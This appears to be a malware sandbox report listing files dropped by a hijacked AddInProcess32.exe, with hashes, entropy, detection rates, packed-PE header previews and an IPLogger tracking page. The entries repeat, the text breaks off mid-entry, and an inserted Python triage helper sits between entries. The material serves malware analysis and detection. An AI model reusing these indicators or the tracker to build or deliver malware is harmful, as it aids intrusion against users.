Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation:unknown
Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation:unknown
Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................


Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Antivirus:
• Antivirus: Avira, Detection: 100%
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884110624330654
Encrypted:false
SSDEEP:98304:S0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwT:pPMki6zio75L3pf3dedO4keCIwkoYbgz
MD5:2CF99CA2E0CB98555FCA7D2FB3187553
SHA1:9E822489CFF5EB8CDB1D9FA25A3AB1F1CE22C3E1
SHA-256:4BEDF8A334DC13995596AC4C7A7D9B0316B2201669F083ED4F356350BD0F5672
SHA-512:D6AF12152138676A030BE5D562FB41DAE9A9588DB3775745FF8AF676485AABAAB5620580C9E40B8DE1716EE6B3A91F992DAEE85B7F923A23570EB3A1D7890117
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R......!S...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884113824850883
Encrypted:false
SSDEEP:98304:F0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwg:4PMki6zio75L3pf3dedO4keCIwkoYbgA
MD5:0526E162D972CC6D991169D07E04565C
SHA1:4CDD1615E27327F710E23DBAFF067F61F9FFB0B9
SHA-256:9FFDDB23C6C118B124BE8AE1D4F9C819804A178AC2938CD18E9C553005CF4B29
SHA-512:BF6BF40608D9371EE6EAB5AFCF0EF7FBE6F9EC518B0D09741C67B7221B9C69B0504385FC2AD55A6893766304F8D9A4B8F6A4DEAE64CA76B21554713B3DCDCFAD
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.....F>R...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................
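Triage helper for dropped-file entries like the ones listed above, added here as an example; it is not part of the Joe Sandbox report nor code from any tool the report describes. It recomputes the fields the table lists (size, 8-bit Shannon entropy, MD5/SHA-1/SHA-256/SHA-512, and a content-sniffed file type read from the MZ header, e_lfanew and the PE signature) over constructed sample bytes, and raises the two flags an analyst checks by hand on such a table: a PE whose entropy approaches 8 bits/byte, as with the 4405128-byte drop above at 7.969, and a file named .exe whose content is actually HTML, as with the IPLogger redirect page listed above. The 7.2 entropy threshold, the sample file names and the helper names (build_sample_pe32, pseudo_random_bytes, triage_all) are assumptions made for this example, not Joe Sandbox values.

```python
import hashlib
import math
from dataclasses import dataclass, field

# Assumption for this example: PE images at or above this entropy are treated as packed/encrypted.
PACKED_ENTROPY_THRESHOLD = 7.2


@dataclass
class DroppedFileTriage:
    name: str
    size: int
    entropy: float
    md5: str
    sha1: str
    sha256: str
    sha512: str
    file_type: str
    flags: list = field(default_factory=list)


def shannon_entropy_8bit(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, 0.0 (constant) to 8.0 (uniform)."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def sniff_file_type(data: bytes) -> str:
    """Type from content, not extension: MZ -> e_lfanew (offset 0x3C) -> 'PE\\0\\0' -> COFF Machine."""
    if data[:2] == b"MZ" and len(data) >= 0x40:
        e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
        if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
            machine = int.from_bytes(data[e_lfanew + 4:e_lfanew + 6], "little")
            if machine == 0x14C:
                return "PE32 executable Intel 80386"
            if machine == 0x8664:
                return "PE32+ executable x86-64"
            return f"PE executable (machine=0x{machine:04x})"
        return "MZ without PE header"
    head = data.lstrip()[:16].lower()
    if head.startswith(b"<!doctype html") or head.startswith(b"<html"):
        return "HTML document"
    return "unknown"


def triage_dropped_file(name: str, data: bytes) -> DroppedFileTriage:
    """Recompute the report's hash/entropy/type fields and flag the two classic mismatches."""
    ftype = sniff_file_type(data)
    ent = shannon_entropy_8bit(data)
    t = DroppedFileTriage(
        name=name, size=len(data), entropy=ent,
        md5=hashlib.md5(data).hexdigest().upper(),
        sha1=hashlib.sha1(data).hexdigest().upper(),
        sha256=hashlib.sha256(data).hexdigest().upper(),
        sha512=hashlib.sha512(data).hexdigest().upper(),
        file_type=ftype,
    )
    if ftype.startswith("PE") and ent >= PACKED_ENTROPY_THRESHOLD:
        t.flags.append("high-entropy PE: packed or encrypted payload likely")
    if name.lower().endswith(".exe") and not ftype.startswith("PE"):
        t.flags.append(f"extension/content mismatch: .exe name but {ftype}")
    return t


def pseudo_random_bytes(n: int, seed: bytes = b"triage-demo") -> bytes:
    """Deterministic high-entropy filler (SHA-256 chain) standing in for a packed section. Constructed."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe32(payload: bytes) -> bytes:
    """Constructed minimal PE32 shell (not runnable): DOS header, e_lfanew=0x80, PE signature, Machine=0x14C."""
    e_lfanew = 0x80
    dos = bytearray(b"MZ" + b"\0" * (e_lfanew - 2))
    dos[0x3C:0x40] = e_lfanew.to_bytes(4, "little")
    coff = b"PE\0\0" + (0x14C).to_bytes(2, "little") + b"\0" * 18  # rest of COFF header zeroed
    return bytes(dos) + coff + payload


# Constructed samples: a "packed" PE, a zero-filled PE, and an HTML page dropped under an .exe name.
SAMPLES = {
    "packed.exe": build_sample_pe32(pseudo_random_bytes(64 * 1024)),
    "plain.exe": build_sample_pe32(b"\0" * (64 * 1024)),
    "redirect.exe": b'<!DOCTYPE html>\n<html lang="" class="html">\n<head></head><body>constructed</body></html>\n',
}


def triage_all(samples=SAMPLES) -> dict:
    return {name: triage_dropped_file(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for t in triage_all().values():
        print(f"{t.name}: {t.file_type}, {t.size} bytes, entropy {t.entropy:.3f}, SHA-256 {t.sha256}")
        for flag in t.flags:
            print("  !", flag)
```

Run it against real drops by replacing SAMPLES with `{path: open(path, "rb").read()}`; the hashes it prints can be compared directly with the MD5/SHA columns of the table above, and any entry whose recomputed type disagrees with its extension or whose entropy crosses the threshold is the one to unpack first.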

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):6711576
Entropy (8bit):7.996143373588409
Encrypted:true
SSDEEP:196608:91OVbE7giOz8u70OteFI7tfL6TCdPeMLN3Ie:3OmBOUIECdVLN4e
MD5:AAA56797070369AD346FBD9BB6CC5E8B
SHA1:A1D01943F0A354D3A000628262671254CA6A91B8
SHA-256:9D7D08AC35F0113F7C814D257BF88B8222975AAA0A3FDEDA88AC7185DBC50905
SHA-512:E69D25A158567C6BCE6E9450DE17D0814B9B9C11F4BB31E5DCC3E8B4378062CC7E31DA625F6BA4A2280B393034A6C832A0FC0A1E16364DC7E8C8146DE245B5BE
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 75%
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........W..s...s...s...}...s...y..s...,...s...r.!.s.......s...x..s.......s.......s.^.u...s.Rich..s.........PE..L....S.L.............................K............@.............................................................................d....p..`............................................................................................................text.............................. ..`.rdata...D.......F..................@..@.data...HZ.......2..................@....sxdata......`......................@....rsrc...`....p......................@..@................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4405128
Entropy (8bit):7.969340138439332
Encrypted:false
SSDEEP:98304:Ljy//HaMA0oZdbKSc0+JUZTVnoWtL+8xpWZFuo2:7pjD+c6O+8yZ12
MD5:F6C9E6F8396274E57FBA6BE593B90E36
SHA1:F520EE5C992A120ACFA2EB040CB4148F8F98C6CA
SHA-256:532B964F0E1319E50CE1BA3A20E05A4D15F822084E92BDC1E799A1D18231ACDB
SHA-512:07545E6046C18D9F32E660AAE983963032197DCDE6F7CDE3D7D8C59E8D86DD7E34D68AFCFFAFC609F9034511B08124910C9FCD2D54BA8D0E90AD1D2622D73FF2
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L......e.....................N......O?............@..........................`......L.C.........................................P....................,C.................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data.............?.................@....rsrc................vA.............@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5387648
Entropy (8bit):6.884112279012331
Encrypted:false
SSDEEP:98304:a0NF76666666666666666666666666666666x666666666666666fwwwwwwwwwwV:hPMki6zio75L3pf3dedO4keCIwkoYbg1
MD5:038277CE883ED4FE67639A55CB3E9496
SHA1:2965A6D2ABF9349A4F2F56511994F27F5A9AFD8D
SHA-256:D977EE5640A459A72126A8A80D9D0E946570EAFF1951A8B622C5E9BE2C411382
SHA-512:AC2B666E2D3159488B9B28D1645212D7E19A83AD0F0D79EEE624D3E1BB357750B593D94B91AE52A9F463193F457ADC67223FEE5F1387B29F2ECC28D81599E11B
Malicious:true
Reputation:unknown
Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....S"f.........."......Z....M.....|*............@..........................`R.......S...@.....................................P........yL...........R..+... R..7..`...............................8q...............................................text....X.......Z.................. ..`.rdata.......p.......^..............@..@.data....4...P.......8..............@....tls.................V..............@....rsrc....yL......zL..X..............@..@.reloc...7... R..8....Q.............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):473089
Entropy (8bit):7.146087505769809
Encrypted:false
SSDEEP:6144:XCcFidBDVC3puEQ482NKwo1Qdv4cGLt5hEMSIBaKqbIE4:XCcFidBDs3pGJwiQdv4cGXboEE4
MD5:CCEE6D525CB5940F123C86DB6EDD40DA
SHA1:6D17CB82E8C53E726B440CCFD0B179B70CC74FAD
SHA-256:CAF653628C3B248D6B9690FE887533E41C8EB03B859CB92EF6C1683D0CAB7CDB
SHA-512:916D3D964DC4803CBC5A1DA85BA47ABAF8F95A5609936BE5B4442CF3AE6C896B3C82A7B600DC231A4B5B958900899577F960165EE4FC722A46F6D698788FB940
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......[}...............N|......NC.b....NB.3....d0.........p.....F......Nx.......}.....Rich............PE..L...x.%d.....................Z......O?............@..........................p..................................................P.......E...............................8...............................@............................................text...8........................... ..`.rdata.............................@..@.data...............................@....rsrc...E...........................@..@................................................................................................................................................................................................................................................................................................................................................................................

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
File Type:MS-DOS executable PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows, MZ for MS-DOS
Category:dropped
Size (bytes):4407808
Entropy (8bit):7.9915034437777726
Encrypted:true
SSDEEP:98304:e58vmrQB/A24LDjFO07zDJHBSswWbdIM9F4AoP829ni+tiCCb:e5IB/A241ttEkIO4AoU2ZvnCb
MD5:3953BBAD77CDCB9D5AF2694EED7E6688
SHA1:F965B69EB36D1FBDFB7DFA8C26BA959F395B3223
SHA-256:62206E7CB02B4FE03C535AA4DAAECFA46B42DBD28A756471E50784B7622CECAF
SHA-512:94A5033EDE92683E063829C5A8F2D720C919D1320BF4DB18CC9A2E2A69387530B4AFACC73CF987695A01C09ACBA1169EEA77A0FF269B41698147CD64E64A7D38
Malicious:true
Antivirus:
• Antivirus: ReversingLabs, Detection: 16%
Reputation:unknown
Preview:MZ@.....................................!..L.!Win64 .EXE...$@...PE..d......f.........."....'.....^.................@......................................C... ..............................................................6...%s.................................................(.......................`............................MPRESS1..........@......................MPRESS2..............@..................rsrc....6.......8....A.............@..............................................................v2.19z...@. ..l...m.....:.m...|'*..c.k.X.........;.}Z....c.4...q..s......E...s.Z.:.+..........wj7..r.W.@J4.k.&.N.._.AZ..%|xu..}..u...u.]..\.H..c3\..d.l..\...xq|...zg....._.9?.rs.H..b0I.+.....7..'...O..K@.i...2....8.T.FC]..y.7a d...j)^".P....'7..Ey..p.......g.Ol.U.....@...+.5..-.....(..=bVr.z.L..........d.0.qM....`*.W..;Q P..^.9.&.(..S}7.Z3...Q..0.n<.B\.O.<(~..%..@....C.....3........sG...^T.U. _...vQp......g7..b..Dm......9E.`.p..Sn*p..b..4.|FUT..AWOs.........a.

Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
